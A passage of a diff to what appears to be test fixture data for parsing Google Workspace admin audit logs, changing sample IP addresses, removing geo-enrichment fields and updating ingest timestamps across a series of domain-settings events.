"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "CHANGE_ALERT_CRITERIA", "id": "1", @@ -502,7 +394,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -526,35 +418,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091175800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", + "ingested": "2021-12-09T13:38:31.915787Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "DELETE_ALERT", "id": "1", @@ -584,7 +458,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -608,35 +482,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091178600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915790700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALERT_RECEIVERS_CHANGED", "id": "1", @@ -666,7 +522,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -688,35 +544,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091181400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915795200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_ALERT", "id": "1", @@ -746,7 +584,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -770,35 +608,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091184100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915799500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALERT_STATUS_CHANGED", "id": "1", @@ -828,7 +648,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -852,35 +672,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091186900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915803800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "ADD_DOMAIN_ALIAS", "id": "1", @@ -910,7 +712,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -934,35 +736,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091190Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915807600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REMOVE_DOMAIN_ALIAS", "id": "1", @@ -992,7 +776,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1016,35 +800,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091192700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915812400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "SKIP_DOMAIN_ALIAS_MX", "id": "1", @@ -1074,7 +840,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1098,35 +864,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091195500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915816300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "VERIFY_DOMAIN_ALIAS_MX", "id": "1", @@ -1156,7 +904,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1180,35 +928,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091198200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}", + "ingested": "2021-12-09T13:38:31.915821100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}", "provider": "admin", "action": "VERIFY_DOMAIN_ALIAS", "id": "1", @@ -1238,7 +968,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1262,35 +992,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091201Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915826900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_OAUTH_ACCESS_TO_ALL_APIS", "id": "1", @@ -1321,7 +1033,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1345,35 +1057,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091203800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915832800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_ALLOW_ADMIN_PASSWORD_RESET", "id": "1", @@ -1404,7 +1098,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1428,35 +1122,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091206500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}", + "ingested": "2021-12-09T13:38:31.915838700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}", "provider": "admin", "action": "ENABLE_API_ACCESS", "id": "1", @@ -1487,7 +1163,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1511,35 +1187,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091209200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}", + "ingested": "2021-12-09T13:38:31.915844500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}", "provider": "admin", "action": "AUTHORIZE_API_CLIENT_ACCESS", "id": "1", @@ -1569,7 +1227,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1593,35 +1251,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091211900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}", + "ingested": "2021-12-09T13:38:31.915850200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}", "provider": "admin", "action": "REMOVE_API_CLIENT_ACCESS", "id": "1", @@ -1651,7 +1291,7 @@ "foo" ], "ip": [ - 